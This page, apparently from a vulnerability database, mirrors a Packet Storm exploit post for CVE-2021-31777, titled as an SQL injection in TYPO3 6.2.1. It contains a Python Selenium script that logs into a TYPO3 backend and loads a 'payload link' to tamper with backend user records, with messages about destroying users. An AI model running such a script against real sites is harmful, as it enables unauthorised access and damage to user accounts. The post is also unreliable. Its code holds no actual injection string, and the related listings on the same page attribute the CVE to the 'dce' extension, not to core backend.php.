Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:162429
HistoryMay 03, 2021 - 12:00 a.m.

TYPO3 6.2.1 SQL Injection

2021-05-0300:00:00
nu11secur1ty
packetstormsecurity.com
123
JSON
`# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php  
# Author: @nu11secur1ty  
# Testing and Debugging: @nu11secur1ty  
# Date: 05.02.2021  
# Vendor: https://typo3.org/  
# Link: https://get.typo3.org/version/6.2.1  
# CVE: CVE-2021-31777  
# Proof: https://streamable.com/8v7v4i  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# CVE-2021-31777  
  
from selenium import webdriver  
import time  
import os, sys  
  
  
# Vendor: https://typo3.org/  
website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"  
  
# enter your login username  
username="nu11secur1ty"  
  
# enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="username"  
  
#enter the element for password input field  
element_for_password="p_field"  
  
#enter the element for submit button  
element_for_submit="commandLI"  
  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
time.sleep(3)  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Exploit vulnerability MySQL user table by using backend.php vulnerability  
time.sleep(3)  
# Payload link  
browser.get(("  
http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"))  
  
  
print("The payload is deployed it is time to destroy some user...\n")  
os.system('pause')  
  
browser.close()  
  
except Exception:  
#### This exception is if the user is not found in the database or  
something is wrong.  
print("Sorry, but this user who you searching for is destroyed by using of  
MySQL vulnerability in backend.php...")  
  
---------------------------------  
  
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on  
backend.php  
# Date: 05.02.2021  
# Exploit Authotr idea: @nu11secur1ty  
# Exploit Debugging: @nu11secur1ty  
# Vendor Homepage: https://typo3.org/  
# Software Link: https://get.typo3.org/version/6.2.1  
  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777  
  
`

Related

typo3 1
cve 1
github 1
prion 1
cnvd 1
osv 1
zdt 1
typo3
typo3
SQL Injection in extension "Dynamic Content Element" (dce)
2021-04-27 00:00:00
cve
cve
CVE-2021-31777
2021-04-28 07:15:00
github
github
SQL Injection in t3/dce
2021-06-08 20:12:23
prion
prion
Sql injection
2021-04-28 07:15:00
cnvd
cnvd
TYPO3 Dynamic Content Element SQL注入漏洞
2021-04-28 00:00:00
osv
osv
SQL Injection in t3/dce
2021-06-08 20:12:23
zdt
zdt
TYPO3 6.2.1 SQL Injection Exploit
2021-05-04 00:00:00
JSON
Related for PACKETSTORM:162429
typo31cve1github1prion1cnvd1osv1zdt1